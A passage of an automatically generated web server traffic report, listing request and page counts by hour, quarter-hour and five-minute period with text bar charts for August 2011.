Thu 05:00–06:0068696459+++++++
Thu 06:00–07:0073106857+++++++
Thu 07:00–08:0083947954++++++++
Thu 08:00–09:001454513915++++++++++++++
Thu 09:00–10:002285521848++++++++++++++++++++++
Thu 10:00–11:002381123045++++++++++++++++++++++++
Thu 11:00–12:002568024734+++++++++++++++++++++++++
Thu 12:00–13:002634725398++++++++++++++++++++++++++
Thu 13:00–14:002738526412+++++++++++++++++++++++++++
Thu 14:00–15:002546424586+++++++++++++++++++++++++
Thu 15:00–16:002563024348+++++++++++++++++++++++++
Thu 16:00–17:002374222415+++++++++++++++++++++++
Thu 17:00–18:002032419439++++++++++++++++++++
Thu 18:00–19:001857117752++++++++++++++++++
Thu 19:00–20:001765216878+++++++++++++++++
Thu 20:00–21:001370813037++++++++++++++
Thu 21:00–22:001225211779++++++++++++
Thu 22:00–23:00104589976++++++++++
Thu 23:00–24:0096088819+++++++++
    
Fri 00:00–01:0074336994+++++++
Fri 01:00–02:0056935363++++++
Fri 02:00–03:0063125911++++++
Fri 03:00–04:0057895460++++++
Fri 04:00–05:0053064871+++++
Fri 05:00–06:0071616742+++++++
Fri 06:00–07:0059885619++++++
Fri 07:00–08:0077737244++++++++
Fri 08:00–09:001321212286+++++++++++++
Fri 09:00–10:001820017113++++++++++++++++++
Fri 10:00–11:002056319904++++++++++++++++++++
Fri 11:00–12:002385622851+++++++++++++++++++++++
Fri 12:00–13:002098120189+++++++++++++++++++++
Fri 13:00–14:002081220070+++++++++++++++++++++
Fri 14:00–15:002415823517++++++++++++++++++++++++
Fri 15:00–16:002031019487++++++++++++++++++++
Fri 16:00–17:002023819405++++++++++++++++++++
Fri 17:00–18:001350812877+++++++++++++
Fri 18:00–19:001193811246++++++++++++
Fri 19:00–20:0098079218++++++++++
Fri 20:00–21:0093598541+++++++++
Fri 21:00–22:0094138867+++++++++
Fri 22:00–23:0085678069+++++++++
Fri 23:00–24:0073066834+++++++
    
Sat 00:00–01:0065316224+++++++
Sat 01:00–02:0059645678++++++
Sat 02:00–03:0055215226++++++
Sat 03:00–04:0053195014++++++
Sat 04:00–05:0056565342++++++
Sat 05:00–06:0055225183++++++
Sat 06:00–07:0062765948++++++
Sat 07:00–08:0066016220+++++++
Sat 08:00–09:0072586734+++++++
Sat 09:00–10:001261212084+++++++++++++
Sat 10:00–11:001286612307+++++++++++++
Sat 11:00–12:001373813257++++++++++++++
Sat 12:00–13:001330212801+++++++++++++
Sat 13:00–14:001399713517++++++++++++++
Sat 14:00–15:001334512917+++++++++++++
Sat 15:00–16:001520614644+++++++++++++++
Sat 16:00–17:00103539909++++++++++
Sat 17:00–18:0092978868+++++++++
Sat 18:00–19:0088738422+++++++++
Sat 19:00–20:0097489253++++++++++
Sat 20:00–21:0094729031++++++++++
Sat 21:00–22:0089118499+++++++++
Sat 22:00–23:0077667392++++++++
Sat 23:00–24:0071756754+++++++

Hourly Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the total activity for each hour of the day, summed over all the days in the report.

Each unit (+) represents 4,000 requests for pages or part thereof.

hourreqspages 
05184549090+++++++++++++
14781045284++++++++++++
24247440012+++++++++++
33947437281++++++++++
44127838852++++++++++
54253140098+++++++++++
64326240650+++++++++++
75138948351+++++++++++++
88525280346+++++++++++++++++++++
9124356118508++++++++++++++++++++++++++++++
10143717138013+++++++++++++++++++++++++++++++++++
11159301152335+++++++++++++++++++++++++++++++++++++++
12157204150891++++++++++++++++++++++++++++++++++++++
13155651149498++++++++++++++++++++++++++++++++++++++
14159277153458+++++++++++++++++++++++++++++++++++++++
15160075152965+++++++++++++++++++++++++++++++++++++++
16144970138852+++++++++++++++++++++++++++++++++++
17121779117077++++++++++++++++++++++++++++++
18114141109540++++++++++++++++++++++++++++
19108271103690++++++++++++++++++++++++++
209879493948++++++++++++++++++++++++
219324188909+++++++++++++++++++++++
227730373533+++++++++++++++++++
236482661048++++++++++++++++

Quarter-Hour Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each quarter-hour period.

Each unit (+) represents 5 requests for pages or part thereof.

timereqspages 
17/Aug/11 16:45–17:0099++
17/Aug/11 17:00–17:151615+++
17/Aug/11 17:15–17:301211+++
17/Aug/11 17:30–17:4555+
17/Aug/11 17:45–18:001212+++
17/Aug/11 18:00–18:151110++
17/Aug/11 18:15–18:301414+++
17/Aug/11 18:30–18:4565+
17/Aug/11 18:45–19:0088++
17/Aug/11 19:00–19:1599++
17/Aug/11 19:15–19:3033+
17/Aug/11 19:30–19:4577++
17/Aug/11 19:45–20:0087++
    
17/Aug/11 20:00–20:1586++
17/Aug/11 20:15–20:30109++
17/Aug/11 20:30–20:4599++
17/Aug/11 20:45–21:001111+++
17/Aug/11 21:00–21:1577++
17/Aug/11 21:15–21:3033+
17/Aug/11 21:30–21:4566++
17/Aug/11 21:45–22:001717++++
17/Aug/11 22:00–22:152020++++
17/Aug/11 22:15–22:302929++++++
17/Aug/11 22:30–22:455858++++++++++++
17/Aug/11 22:45–23:0088++
17/Aug/11 23:00–23:151413+++
17/Aug/11 23:15–23:3097++
17/Aug/11 23:30–23:4576++
17/Aug/11 23:45–24:0055+
    
18/Aug/11 00:00–00:1599++
18/Aug/11 00:15–00:3087++
18/Aug/11 00:30–00:4532+
18/Aug/11 00:45–01:0098++
18/Aug/11 01:00–01:1522+
18/Aug/11 01:15–01:30117++
18/Aug/11 01:30–01:4554+
18/Aug/11 01:45–02:0043+
18/Aug/11 02:00–02:1598++
18/Aug/11 02:15–02:3033+
18/Aug/11 02:30–02:4533+
18/Aug/11 02:45–03:0000
18/Aug/11 03:00–03:1511+
18/Aug/11 03:15–03:3022+
18/Aug/11 03:30–03:4566++
18/Aug/11 03:45–04:0033+
    
18/Aug/11 04:00–04:151717++++
18/Aug/11 04:15–04:3033+
18/Aug/11 04:30–04:451313+++
18/Aug/11 04:45–05:0055+
18/Aug/11 05:00–05:1588++
18/Aug/11 05:15–05:3088++
18/Aug/11 05:30–05:4555+
18/Aug/11 05:45–06:0055+
18/Aug/11 06:00–06:1555+
18/Aug/11 06:15–06:3066++
18/Aug/11 06:30–06:4588++
18/Aug/11 06:45–07:001413+++
18/Aug/11 07:00–07:15117117++++++++++++++++++++++++
18/Aug/11 07:15–07:306362+++++++++++++
18/Aug/11 07:30–07:4576++
18/Aug/11 07:45–08:001111+++
    
18/Aug/11 08:00–08:151818++++
18/Aug/11 08:15–08:302727++++++
18/Aug/11 08:30–08:452929++++++
18/Aug/11 08:45–09:004443+++++++++
18/Aug/11 09:00–09:151616++++
18/Aug/11 09:15–09:303333+++++++
18/Aug/11 09:30–09:452323+++++
18/Aug/11 09:45–10:003533+++++++
18/Aug/11 10:00–10:152020++++
18/Aug/11 10:15–10:302726++++++
18/Aug/11 10:30–10:452221+++++
18/Aug/11 10:45–11:005844+++++++++
18/Aug/11 11:00–11:151717++++
18/Aug/11 11:15–11:302323+++++
18/Aug/11 11:30–11:451918++++
18/Aug/11 11:45–12:002121+++++
    
18/Aug/11 12:00–12:151616++++
18/Aug/11 12:15–12:301211+++
18/Aug/11 12:30–12:451715+++
18/Aug/11 12:45–13:003431+++++++
18/Aug/11 13:00–13:152827++++++
18/Aug/11 13:15–13:302121+++++
18/Aug/11 13:30–13:451412+++
18/Aug/11 13:45–14:002322+++++
18/Aug/11 14:00–14:152422+++++
18/Aug/11 14:15–14:301818++++
18/Aug/11 14:30–14:452625+++++
18/Aug/11 14:45–15:002424+++++
18/Aug/11 15:00–15:151212+++
18/Aug/11 15:15–15:301615+++
18/Aug/11 15:30–15:4512043+++++++++
18/Aug/11 15:45–16:004642+++++++++
    
18/Aug/11 16:00–16:151212+++
18/Aug/11 16:15–16:301817++++
18/Aug/11 16:30–16:4577++

Busiest quarter of an hour: 18/May/10 01:45–02:00 (2,397 requests for pages).

Quarter-Hour Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the total activity for each quarter-hour period of the day, summed over all the days in the report.

Each unit (+) represents 1,500 requests for pages or part thereof.

timereqspages 
00:00–00:151454613756++++++++++
00:15–00:301314312448+++++++++
00:30–00:451206711436++++++++
00:45–01:001208911450++++++++
01:00–01:151140110788++++++++
01:15–01:301223311597++++++++
01:30–01:451121610615++++++++
01:45–02:001296012284+++++++++
02:00–02:151114410535++++++++
02:15–02:301095910350+++++++
02:30–02:45105069858+++++++
02:45–03:0098659269+++++++
03:00–03:1598299297+++++++
03:15–03:30102619723+++++++
03:30–03:4596939118+++++++
03:45–04:0096919143+++++++
    
04:00–04:15104759890+++++++
04:15–04:30100899506+++++++
04:30–04:451061010004+++++++
04:45–05:00101049452+++++++
05:00–05:1598979320+++++++
05:15–05:301143510874++++++++
05:30–05:45100169327+++++++
05:45–06:001118310577++++++++
06:00–06:15103829749+++++++
06:15–06:30100419476+++++++
06:30–06:451123910587++++++++
06:45–07:001160010838++++++++
07:00–07:151172011028++++++++
07:15–07:301252011849++++++++
07:30–07:451295912114+++++++++
07:45–08:001419013360+++++++++
    
08:00–08:151696615977+++++++++++
08:15–08:302081219681++++++++++++++
08:30–08:452260721258+++++++++++++++
08:45–09:002486723430++++++++++++++++
09:00–09:152792426466++++++++++++++++++
09:15–09:303062229132++++++++++++++++++++
09:30–09:453171130429+++++++++++++++++++++
09:45–10:003409932481++++++++++++++++++++++
10:00–10:153348532308++++++++++++++++++++++
10:15–10:303578934462+++++++++++++++++++++++
10:30–10:453668134951++++++++++++++++++++++++
10:45–11:003776236292+++++++++++++++++++++++++
11:00–11:153791636242+++++++++++++++++++++++++
11:15–11:303869036986+++++++++++++++++++++++++
11:30–11:454295741167++++++++++++++++++++++++++++
11:45–12:003973837940++++++++++++++++++++++++++
    
12:00–12:153852837099+++++++++++++++++++++++++
12:15–12:303905337306+++++++++++++++++++++++++
12:30–12:453973838259++++++++++++++++++++++++++
12:45–13:003988538227++++++++++++++++++++++++++
13:00–13:154013038320++++++++++++++++++++++++++
13:15–13:303910337644++++++++++++++++++++++++++
13:30–13:453844836905+++++++++++++++++++++++++
13:45–14:003797036629+++++++++++++++++++++++++
14:00–14:154112739547+++++++++++++++++++++++++++
14:15–14:304021438850++++++++++++++++++++++++++
14:30–14:453905637582++++++++++++++++++++++++++
14:45–15:003888037479+++++++++++++++++++++++++
15:00–15:154010638202++++++++++++++++++++++++++
15:15–15:303975938052++++++++++++++++++++++++++
15:30–15:454089639123+++++++++++++++++++++++++++
15:45–16:003931437588++++++++++++++++++++++++++
    
16:00–16:153701135402++++++++++++++++++++++++
16:15–16:303637234772++++++++++++++++++++++++
16:30–16:453596734441+++++++++++++++++++++++
16:45–17:003562034237+++++++++++++++++++++++
17:00–17:153192330756+++++++++++++++++++++
17:15–17:303175630596+++++++++++++++++++++
17:30–17:452950228322+++++++++++++++++++
17:45–18:002859827403+++++++++++++++++++
18:00–18:152797026797++++++++++++++++++
18:15–18:302804827046+++++++++++++++++++
18:30–18:452788326607++++++++++++++++++
18:45–19:003024029090++++++++++++++++++++
19:00–19:152608724951+++++++++++++++++
19:15–19:302664025544++++++++++++++++++
19:30–19:452780826642++++++++++++++++++
19:45–20:002773626553++++++++++++++++++
    
20:00–20:152653925287+++++++++++++++++
20:15–20:302545024326+++++++++++++++++
20:30–20:452410822863++++++++++++++++
20:45–21:002269721472+++++++++++++++
21:00–21:152468523653++++++++++++++++
21:15–21:302422723016++++++++++++++++
21:30–21:452291121826+++++++++++++++
21:45–22:002141820414++++++++++++++
22:00–22:151967418638+++++++++++++
22:15–22:302064419668++++++++++++++
22:30–22:451987419007+++++++++++++
22:45–23:001711116220+++++++++++
23:00–23:151792516741++++++++++++
23:15–23:301700316137+++++++++++
23:30–23:451523214304++++++++++
23:45–24:001466613866++++++++++

Five-Minute Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the activity in each five-minute period.

Each unit (+) represents 4 requests for pages or part thereof.

timereqspages 
17/Aug/11 16:35–16:4032+
17/Aug/11 16:40–16:4566++
17/Aug/11 16:45–16:5033+
17/Aug/11 16:50–16:5555++
17/Aug/11 16:55–17:0011+
    
17/Aug/11 17:00–17:0576++
17/Aug/11 17:05–17:1099+++
17/Aug/11 17:10–17:1500
17/Aug/11 17:15–17:2044+
17/Aug/11 17:20–17:2521+
17/Aug/11 17:25–17:3066++
17/Aug/11 17:30–17:3544+
17/Aug/11 17:35–17:4011+
17/Aug/11 17:40–17:4500
17/Aug/11 17:45–17:5077++
17/Aug/11 17:50–17:5522+
17/Aug/11 17:55–18:0033+
    
17/Aug/11 18:00–18:0521+
17/Aug/11 18:05–18:1088++
17/Aug/11 18:10–18:1511+
17/Aug/11 18:15–18:2011+
17/Aug/11 18:20–18:2577++
17/Aug/11 18:25–18:3066++
17/Aug/11 18:30–18:3565++
17/Aug/11 18:35–18:4000
17/Aug/11 18:40–18:4500
17/Aug/11 18:45–18:5022+
17/Aug/11 18:50–18:5544+
17/Aug/11 18:55–19:0022+
    
17/Aug/11 19:00–19:0511+
17/Aug/11 19:05–19:1066++
17/Aug/11 19:10–19:1522+
17/Aug/11 19:15–19:2022+
17/Aug/11 19:20–19:2500
17/Aug/11 19:25–19:3011+
17/Aug/11 19:30–19:3555++
17/Aug/11 19:35–19:4011+
17/Aug/11 19:40–19:4511+
17/Aug/11 19:45–19:5054+
17/Aug/11 19:50–19:5511+
17/Aug/11 19:55–20:0022+
    
17/Aug/11 20:00–20:0533+
17/Aug/11 20:05–20:1011+
17/Aug/11 20:10–20:1542+
17/Aug/11 20:15–20:2011+
17/Aug/11 20:20–20:2511+
17/Aug/11 20:25–20:3087++
17/Aug/11 20:30–20:3544+
17/Aug/11 20:35–20:4033+
17/Aug/11 20:40–20:4522+
17/Aug/11 20:45–20:5033+
17/Aug/11 20:50–20:5566++
17/Aug/11 20:55–21:0022+
    
17/Aug/11 21:00–21:0522+
17/Aug/11 21:05–21:1011+
17/Aug/11 21:10–21:1544+
17/Aug/11 21:15–21:2000
17/Aug/11 21:20–21:2522+
17/Aug/11 21:25–21:3011+
17/Aug/11 21:30–21:3511+
17/Aug/11 21:35–21:4033+
17/Aug/11 21:40–21:4522+
17/Aug/11 21:45–21:5044+
17/Aug/11 21:50–21:5566++
17/Aug/11 21:55–22:0077++
    
17/Aug/11 22:00–22:0522+
17/Aug/11 22:05–22:1088++
17/Aug/11 22:10–22:151010+++
17/Aug/11 22:15–22:201313++++
17/Aug/11 22:20–22:2599+++
17/Aug/11 22:25–22:3077++
17/Aug/11 22:30–22:3555++
17/Aug/11 22:35–22:401010+++
17/Aug/11 22:40–22:454343+++++++++++
17/Aug/11 22:45–22:5011+
17/Aug/11 22:50–22:5555++
17/Aug/11 22:55–23:0022+
    
17/Aug/11 23:00–23:0555++
17/Aug/11 23:05–23:1088++
17/Aug/11 23:10–23:1510
17/Aug/11 23:15–23:2031+
17/Aug/11 23:20–23:2522+
17/Aug/11 23:25–23:3044+
17/Aug/11 23:30–23:3533+
17/Aug/11 23:35–23:4011+
17/Aug/11 23:40–23:4532+
17/Aug/11 23:45–23:5022+
17/Aug/11 23:50–23:5533+
17/Aug/11 23:55–24:0000
    
18/Aug/11 00:00–00:0588++
18/Aug/11 00:05–00:1011+
18/Aug/11 00:10–00:1500
18/Aug/11 00:15–00:2044+
18/Aug/11 00:20–00:2522+
18/Aug/11 00:25–00:3021+
18/Aug/11 00:30–00:3510
18/Aug/11 00:35–00:4022+
18/Aug/11 00:40–00:4500
18/Aug/11 00:45–00:5011+
18/Aug/11 00:50–00:5566++
18/Aug/11 00:55–01:0021+
    
18/Aug/11 01:00–01:0500
18/Aug/11 01:05–01:1011+
18/Aug/11 01:10–01:1511+
18/Aug/11 01:15–01:2043+
18/Aug/11 01:20–01:2532+
18/Aug/11 01:25–01:3042+
18/Aug/11 01:30–01:3533+
18/Aug/11 01:35–01:4011+
18/Aug/11 01:40–01:4510
18/Aug/11 01:45–01:5032+
18/Aug/11 01:50–01:5500
18/Aug/11 01:55–02:0011+
    
18/Aug/11 02:00–02:0522+
18/Aug/11 02:05–02:1044+
18/Aug/11 02:10–02:1532+
18/Aug/11 02:15–02:2022+
18/Aug/11 02:20–02:2500
18/Aug/11 02:25–02:3011+
18/Aug/11 02:30–02:3511+
18/Aug/11 02:35–02:4022+
18/Aug/11 02:40–02:4500
18/Aug/11 02:45–02:5000
18/Aug/11 02:50–02:5500
18/Aug/11 02:55–03:0000
    
18/Aug/11 03:00–03:0500
18/Aug/11 03:05–03:1011+
18/Aug/11 03:10–03:1500
18/Aug/11 03:15–03:2011+
18/Aug/11 03:20–03:2511+
18/Aug/11 03:25–03:3000
18/Aug/11 03:30–03:3522+
18/Aug/11 03:35–03:4033+
18/Aug/11 03:40–03:4511+
18/Aug/11 03:45–03:5011+
18/Aug/11 03:50–03:5511+
18/Aug/11 03:55–04:0011+
    
18/Aug/11 04:00–04:0533+
18/Aug/11 04:05–04:101313++++
18/Aug/11 04:10–04:1511+
18/Aug/11 04:15–04:2011+
18/Aug/11 04:20–04:2511+
18/Aug/11 04:25–04:3011+
18/Aug/11 04:30–04:3533+
18/Aug/11 04:35–04:4011+
18/Aug/11 04:40–04:4599+++
18/Aug/11 04:45–04:5055++
18/Aug/11 04:50–04:5500
18/Aug/11 04:55–05:0000
    
18/Aug/11 05:00–05:0544+
18/Aug/11 05:05–05:1000
18/Aug/11 05:10–05:1544+
18/Aug/11 05:15–05:2066++
18/Aug/11 05:20–05:2500
18/Aug/11 05:25–05:3022+
18/Aug/11 05:30–05:3533+
18/Aug/11 05:35–05:4022+
18/Aug/11 05:40–05:4500
18/Aug/11 05:45–05:5033+
18/Aug/11 05:50–05:5511+
18/Aug/11 05:55–06:0011+
    
18/Aug/11 06:00–06:0555++
18/Aug/11 06:05–06:1000
18/Aug/11 06:10–06:1500
18/Aug/11 06:15–06:2044+
18/Aug/11 06:20–06:2511+
18/Aug/11 06:25–06:3011+
18/Aug/11 06:30–06:3555++
18/Aug/11 06:35–06:4011+
18/Aug/11 06:40–06:4522+
18/Aug/11 06:45–06:5077++
18/Aug/11 06:50–06:5521+
18/Aug/11 06:55–07:0055++
    
18/Aug/11 07:00–07:0544+
18/Aug/11 07:05–07:10112112++++++++++++++++++++++++++++
18/Aug/11 07:10–07:1511+
18/Aug/11 07:15–07:201717+++++
18/Aug/11 07:20–07:253838++++++++++
18/Aug/11 07:25–07:3087++
18/Aug/11 07:30–07:3544+
18/Aug/11 07:35–07:4032+
18/Aug/11 07:40–07:4500
18/Aug/11 07:45–07:5022+
18/Aug/11 07:50–07:5566++
18/Aug/11 07:55–08:0033+
    
18/Aug/11 08:00–08:0566++
18/Aug/11 08:05–08:1066++
18/Aug/11 08:10–08:1566++
18/Aug/11 08:15–08:201111+++
18/Aug/11 08:20–08:251313++++
18/Aug/11 08:25–08:3033+
18/Aug/11 08:30–08:3588++
18/Aug/11 08:35–08:401212+++
18/Aug/11 08:40–08:4599+++
18/Aug/11 08:45–08:501010+++
18/Aug/11 08:50–08:551616++++
18/Aug/11 08:55–09:001817+++++
    
18/Aug/11 09:00–09:0577++
18/Aug/11 09:05–09:1022+
18/Aug/11 09:10–09:1577++
18/Aug/11 09:15–09:2088++
18/Aug/11 09:20–09:251919+++++
18/Aug/11 09:25–09:3066++
18/Aug/11 09:30–09:351111+++
18/Aug/11 09:35–09:4077++
18/Aug/11 09:40–09:4555++
18/Aug/11 09:45–09:5066++
18/Aug/11 09:50–09:551816++++
18/Aug/11 09:55–10:001111+++
    
18/Aug/11 10:00–10:0511+
18/Aug/11 10:05–10:101212+++
18/Aug/11 10:10–10:1577++
18/Aug/11 10:15–10:2066++
18/Aug/11 10:20–10:2555++
18/Aug/11 10:25–10:301615++++
18/Aug/11 10:30–10:3566++
18/Aug/11 10:35–10:4033+
18/Aug/11 10:40–10:451312+++
18/Aug/11 10:45–10:501111+++
18/Aug/11 10:50–10:552323++++++
18/Aug/11 10:55–11:002410+++
    
18/Aug/11 11:00–11:0533+
18/Aug/11 11:05–11:1011+
18/Aug/11 11:10–11:151313++++
18/Aug/11 11:15–11:2088++
18/Aug/11 11:20–11:2566++
18/Aug/11 11:25–11:3099+++
18/Aug/11 11:30–11:3544+
18/Aug/11 11:35–11:4033+
18/Aug/11 11:40–11:451211+++
18/Aug/11 11:45–11:5088++
18/Aug/11 11:50–11:5599+++
18/Aug/11 11:55–12:0044+
    
18/Aug/11 12:00–12:0533+
18/Aug/11 12:05–12:1011+
18/Aug/11 12:10–12:151212+++
18/Aug/11 12:15–12:2022+
18/Aug/11 12:20–12:2522+
18/Aug/11 12:25–12:3087++
18/Aug/11 12:30–12:3544+
18/Aug/11 12:35–12:4055++
18/Aug/11 12:40–12:4586++
18/Aug/11 12:45–12:501010+++
18/Aug/11 12:50–12:5576++
18/Aug/11 12:55–13:001715++++
    
18/Aug/11 13:00–13:0533+
18/Aug/11 13:05–13:1076++
18/Aug/11 13:10–13:151818+++++
18/Aug/11 13:15–13:2044+
18/Aug/11 13:20–13:251313++++
18/Aug/11 13:25–13:3044+
18/Aug/11 13:30–13:3543+
18/Aug/11 13:35–13:4055++
18/Aug/11 13:40–13:4554+
18/Aug/11 13:45–13:5055++
18/Aug/11 13:50–13:551312+++
18/Aug/11 13:55–14:0055++
    
18/Aug/11 14:00–14:051413++++
18/Aug/11 14:05–14:1043+
18/Aug/11 14:10–14:1566++
18/Aug/11 14:15–14:2088++
18/Aug/11 14:20–14:2588++
18/Aug/11 14:25–14:3022+
18/Aug/11 14:30–14:3565++
18/Aug/11 14:35–14:4099+++
18/Aug/11 14:40–14:451111+++
18/Aug/11 14:45–14:501212+++
18/Aug/11 14:50–14:5599+++
18/Aug/11 14:55–15:0033+
    
18/Aug/11 15:00–15:0522+
18/Aug/11 15:05–15:1055++
18/Aug/11 15:10–15:1555++
18/Aug/11 15:15–15:2087++
18/Aug/11 15:20–15:2566++
18/Aug/11 15:25–15:3022+
18/Aug/11 15:30–15:3533+
18/Aug/11 15:35–15:402612+++
18/Aug/11 15:40–15:459128+++++++
18/Aug/11 15:45–15:502219+++++
18/Aug/11 15:50–15:551514++++
18/Aug/11 15:55–16:0099+++
    
18/Aug/11 16:00–16:0533+
18/Aug/11 16:05–16:1033+
18/Aug/11 16:10–16:1566++
18/Aug/11 16:15–16:2033+
18/Aug/11 16:20–16:2587++
18/Aug/11 16:25–16:3077++
18/Aug/11 16:30–16:3577++

Busiest five minutes: 18/May/10 01:55–02:00 (1,205 requests for pages).

Five-Minute Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the total activity for each five-minute period of the day, summed over all the days in the report.

Each unit (+) represents 400 requests for pages or part thereof.

timereqspages 
00:00–00:0546434400+++++++++++
00:05–00:1050024715++++++++++++
00:10–00:1549014641++++++++++++
00:15–00:2048384588++++++++++++
00:20–00:2542284014+++++++++++
00:25–00:3040773846++++++++++
00:30–00:3539063717++++++++++
00:35–00:4040543836++++++++++
00:40–00:4541073883++++++++++
00:45–00:5039483720++++++++++
00:50–00:5540403829++++++++++
00:55–01:0041013901++++++++++
    
01:00–01:0537223506+++++++++
01:05–01:1038093597+++++++++
01:10–01:1538703685++++++++++
01:15–01:2040973861++++++++++
01:20–01:2543174116+++++++++++
01:25–01:3038193620++++++++++
01:30–01:3536483480+++++++++
01:35–01:4036703437+++++++++
01:40–01:4538983698++++++++++
01:45–01:5044974226+++++++++++
01:50–01:5537313503+++++++++
01:55–02:0047324555++++++++++++
    
02:00–02:0541683945++++++++++
02:05–02:1033943201+++++++++
02:10–02:1535823389+++++++++
02:15–02:2035473349+++++++++
02:20–02:2537073500+++++++++
02:25–02:3037053501+++++++++
02:30–02:3537103499+++++++++
02:35–02:4035833351+++++++++
02:40–02:4532133008++++++++
02:45–02:5031292933++++++++
02:50–02:5534733251+++++++++
02:55–03:0032633085++++++++
    
03:00–03:0532913090++++++++
03:05–03:1034303264+++++++++
03:10–03:1531082943++++++++
03:15–03:2036023421+++++++++
03:20–03:2533783194++++++++
03:25–03:3032813108++++++++
03:30–03:3532603043++++++++
03:35–03:4034893290+++++++++
03:40–03:4529442785+++++++
03:45–03:5032573072++++++++
03:50–03:5533733151++++++++
03:55–04:0030612920++++++++
    
04:00–04:0534563212+++++++++
04:05–04:1037323569+++++++++
04:10–04:1532873109++++++++
04:15–04:2031042940++++++++
04:20–04:2536233393+++++++++
04:25–04:3033623173++++++++
04:30–04:3535273314+++++++++
04:35–04:4036953510+++++++++
04:40–04:4533883180++++++++
04:45–04:5036653370+++++++++
04:50–04:5531732975++++++++
04:55–05:0032663107++++++++
    
05:00–05:0532113016++++++++
05:05–05:1033213138++++++++
05:10–05:1533653166++++++++
05:15–05:2037553589+++++++++
05:20–05:2541073918++++++++++
05:25–05:3035733367+++++++++
05:30–05:3534383200++++++++
05:35–05:4032132983++++++++
05:40–05:4533653144++++++++
05:45–05:5033383148++++++++
05:50–05:5537073481+++++++++
05:55–06:0041383948++++++++++
    
06:00–06:0534863239+++++++++
06:05–06:1034903283+++++++++
06:10–06:1534063227+++++++++
06:15–06:2031562968++++++++
06:20–06:2533603197++++++++
06:25–06:3035253311+++++++++
06:30–06:3536403422+++++++++
06:35–06:4037853601++++++++++
06:40–06:4538143564+++++++++
06:45–06:5035303267+++++++++
06:50–06:5539863776++++++++++
06:55–07:0040843795++++++++++
    
07:00–07:0537113495+++++++++
07:05–07:1039953790++++++++++
07:10–07:1540143743++++++++++
07:15–07:2040253822++++++++++
07:20–07:2541693944++++++++++
07:25–07:3043264083+++++++++++
07:30–07:3543534032+++++++++++
07:35–07:4042824002+++++++++++
07:40–07:4543244080+++++++++++
07:45–07:5045974288+++++++++++
07:50–07:5545544294+++++++++++
07:55–08:0050394778++++++++++++
    
08:00–08:0554205113+++++++++++++
08:05–08:1058895528++++++++++++++
08:10–08:1556575336++++++++++++++
08:15–08:2062185830+++++++++++++++
08:20–08:2571836803++++++++++++++++++
08:25–08:3074117048++++++++++++++++++
08:30–08:3572496764+++++++++++++++++
08:35–08:4075667076++++++++++++++++++
08:40–08:4577927418+++++++++++++++++++
08:45–08:5083497984++++++++++++++++++++
08:50–08:5577797213+++++++++++++++++++
08:55–09:0087398233+++++++++++++++++++++
    
09:00–09:0587148215+++++++++++++++++++++
09:05–09:1094078910+++++++++++++++++++++++
09:10–09:1598039341++++++++++++++++++++++++
09:15–09:20103539748+++++++++++++++++++++++++
09:20–09:2599729476++++++++++++++++++++++++
09:25–09:30102979908+++++++++++++++++++++++++
09:30–09:35101219706+++++++++++++++++++++++++
09:35–09:401075410309++++++++++++++++++++++++++
09:40–09:451083610414+++++++++++++++++++++++++++
09:45–09:501111310725+++++++++++++++++++++++++++
09:50–09:551123310725+++++++++++++++++++++++++++
09:55–10:001175311031++++++++++++++++++++++++++++
    
10:00–10:051154311124++++++++++++++++++++++++++++
10:05–10:101091810496+++++++++++++++++++++++++++
10:10–10:151102410688+++++++++++++++++++++++++++
10:15–10:201185811503+++++++++++++++++++++++++++++
10:20–10:251183711388+++++++++++++++++++++++++++++
10:25–10:301209411571+++++++++++++++++++++++++++++
10:30–10:351219811665++++++++++++++++++++++++++++++
10:35–10:401219011648++++++++++++++++++++++++++++++
10:40–10:451229311638++++++++++++++++++++++++++++++
10:45–10:501177611346+++++++++++++++++++++++++++++
